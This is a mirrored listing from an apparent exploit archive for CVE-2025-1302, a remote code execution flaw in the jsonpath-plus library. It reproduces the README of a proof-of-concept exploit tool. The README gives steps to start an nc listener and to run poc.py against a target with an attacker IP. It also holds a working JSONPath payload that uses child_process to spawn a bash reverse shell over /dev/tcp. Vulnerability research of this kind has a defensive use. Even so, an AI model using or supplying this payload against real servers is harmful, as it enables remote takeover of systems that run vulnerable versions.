Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-1302 PoC — JSONPath Plus 安全漏洞

Source
https://github.com/abrewer251/CVE-2025-1302_jsonpath-plus_RCE
Associated Vulnerability
Title:JSONPath Plus 安全漏洞 (CVE-2025-1302)
Description:Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).
Description
PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.
Readme
## CVE-2025-1302 JSONPath-Plus RCE PoC

**PoC Script Name:** `poc.py`

A proof-of-concept exploit script for CVE-2025-1302, which targets an RCE vulnerability in the `jsonpath-plus` library. When run against a vulnerable service endpoint, the script attempts to trigger remote code execution via a JSONPath payload and establish a reverse shell back to the attacker.

---

### Features

* **Flexible HTTP methods**: Supports **POST**, **GET**, or **AUTO** (POST with GET fallback) via `--method` or `--no-fallback` flags.
* **Custom payloads**: Load one or more JSONPath RCE payload templates from a file, with `{ip}` and `{port}` templating.
* **Built-in default payload**: If no payload file is provided, uses a fully-formed bash reverse shell template.
* **Verbose debugging**: Prints full request/response bodies for both POST and GET attempts when they fail.
* **Progress indicators**: Displays delay and payload loops with `tqdm` progress bars.
* **Logging**: Optionally save all results to a JSON file with `--output`.

### Installation

1. Clone this repository:

   ```bash
   git clone https://github.com/yourorg/jsonpath-rce-poc.git
   cd jsonpath-rce-poc
   ```

2. Install dependencies (requires Python 3.6+):

   ```bash
   pip install -r requirements.txt
   ```

### Usage

1. Start a listener on your attacker machine (replace port as needed):

   ```bash
   nc -lvnp 9999
   ```

2. Run the PoC:

   ```bash
   python3 poc.py \
     --url http://TARGET_HOST:PORT/query \
     --ip ATTACKER_IP --port 9999 \
     [--payload-file payloads.txt] \
     [--delay 5] \
     [--method AUTO|POST|GET] \
     [--no-fallback] \
     [--output results.json]
   ```

* **`--payload-file`**: File containing one JSONPath payload per line. Use `{ip}` and `{port}` placeholders.
* **`--delay`**: Seconds to wait before sending payloads (shows countdown).
* **`--method`**: Force `POST`, `GET`, or `AUTO` (default).
* **`--no-fallback`**: Shorthand to skip any GET retry (equivalent to `--method POST`).
* **`--output`**: Path to save JSON log of attempts.

### Example Payload File

```text
$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
```

### Contribution

1. Fork the repo and create a feature branch.
2. Submit a pull request with your changes.

### Disclaimer

Use this script **only** in controlled lab environments against systems you own or have explicit permission to test. Abuse may be illegal and unethical.
File Snapshot

 [4.0K]  /data/pocs/d156ca8a63881b4a9a3db53db8332072774dc949
├── [1.0K]  LICENSE
├── [ 289]  package.json
├── [4.4K]  poc.py
└── [2.4K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →